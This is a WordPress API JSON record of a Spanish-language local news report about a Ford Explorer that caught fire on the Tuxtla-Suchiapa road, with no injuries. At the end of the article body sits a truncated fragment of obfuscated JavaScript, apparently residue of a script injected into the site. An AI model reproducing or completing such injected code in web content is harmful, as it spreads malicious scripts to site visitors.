{"id":8453,"date":"2023-02-01T02:48:00","date_gmt":"2023-02-01T02:48:00","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8453"},"modified":"2023-02-01T02:48:00","modified_gmt":"2023-02-01T02:48:00","slug":"se-incendia-camioneta-en-el-tramo-tuxtla-suchiapa","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8453","title":{"rendered":"Se incendia camioneta en el tramo Tuxtla-Suchiapa"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"405\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1675219605700.jpg\" alt=\"\" class=\"wp-image-8454\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1675219605700.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1675219605700-300x169.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 31 de enero del 2023. Tuxtla Guti\u00e9rrez.- Este martes por la tarde una camioneta se incendi\u00f3 una camioneta cuando circulaba en el tramo Tuxtla-Suchiapa cerca de la entrada a Copoya.<\/p>\n\n\n\n<p>La unidad Ford Explorer comenz\u00f3 a quemarse de manera repentina, cuando era conducida de manera normal.<\/p>\n\n\n\n<p>El conductor dijo que, de manera repentina comenz\u00f3 a subir la aguja de la temperatura y a salir humo del cofre y posteriormente las llamas.<\/p>\n\n\n\n<p>Los ocupantes, intentaron abrir la tapa pero no pudieron y en cuesti\u00f3n de segundos se quem\u00f3 todo el frente.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de Bomberos para combatir el fuego que qued\u00f3 apagado en minutos.<\/p>\n\n\n\n<p>Afortunadamente no hubo personas lesionadas pero s\u00ed p\u00e9rdidas materiales.<\/p>\n\n\n\n<p>Finalmente la camioneta fue retirada a un taller para su reparaci\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 31 de enero del 2023. Tuxtla Guti\u00e9rrez.- Este martes por la tarde una camioneta se incendi\u00f3 una camioneta cuando circulaba en el tramo Tuxtla-Suchiapa cerca de la entrada a Copoya. La unidad Ford Explorer comenz\u00f3 a quemarse de manera repentina, cuando era conducida de manera normal. El conductor dijo que, de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8454,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-8453","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8453","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8453"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8453\/revisions"}],"predecessor-version":[{"id":8455,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8453\/revisions\/8455"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8454"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8453"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8453"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8453"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}